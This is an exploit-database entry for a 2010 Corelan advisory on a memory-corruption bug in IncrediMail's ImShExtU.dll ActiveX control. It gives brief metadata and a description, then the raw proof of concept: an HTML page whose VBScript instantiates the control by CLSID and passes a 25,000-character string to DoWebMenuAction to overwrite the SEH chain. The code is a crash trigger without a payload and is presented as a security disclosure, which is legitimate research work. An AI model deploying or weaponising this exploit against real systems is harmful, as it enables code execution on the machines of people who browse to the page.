IncrediMail ImShExtU.dll ActiveX Memory Corruption

vendor:

ImShExtU.dll

by:

Lincoln

7,5

CVSS

HIGH

SEH

119

CWE

Product Name: ImShExtU.dll

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

IncrediMail ImShExtU.dll ActiveX Memory Corruption

The vulnerability exists in the DoWebMenuAction method of the ImShExtU.dll ActiveX control, which is included in IncrediMail. By supplying a long string of 'A' characters to the DoWebMenuAction method, an attacker can overwrite the SEH chain and execute arbitrary code.

Mitigation:

N/A

Source

Exploit-DB raw data:

<html>
<!--
        |------------------------------------------------------------------|
        |                         __               __                      |
        |   _________  ________  / /___ _____     / /____  ____ _____ ___  |
        |  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
        | / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
        | \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
        |                                                                  |
        |                                       http://www.corelan.be:8800 |
        |                                              security@corelan.be |
        |                                                                  |
        |-------------------------------------------------[ EIP Hunters ]--|

# Software      : Incredimail (ImShExtU.dll)
# Reference     : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-038
# Author        : Lincoln
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team 
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#0013F1A4   41414141  AAAA
#0013F1A8   41414141  AAAA
#0013F1AC   41414141  AAAA  Pointer to next SEH record
#0013F1B0   41414141  AAAA  SE handler
#0013F1B4   41414141  AAAA
#0013F1B8   41414141  AAAA
#
-->

<object classid='clsid:F8984111-38B6-11D5-8725-0050DA2761C4' id='target' ></object>
<script language='vbscript'>


crash=String(25000, "A")
target.DoWebMenuAction crash


</script>
<b><center>IncrediMail ImShExtU.dll ActiveX Memory Corruption</b></center>
</html>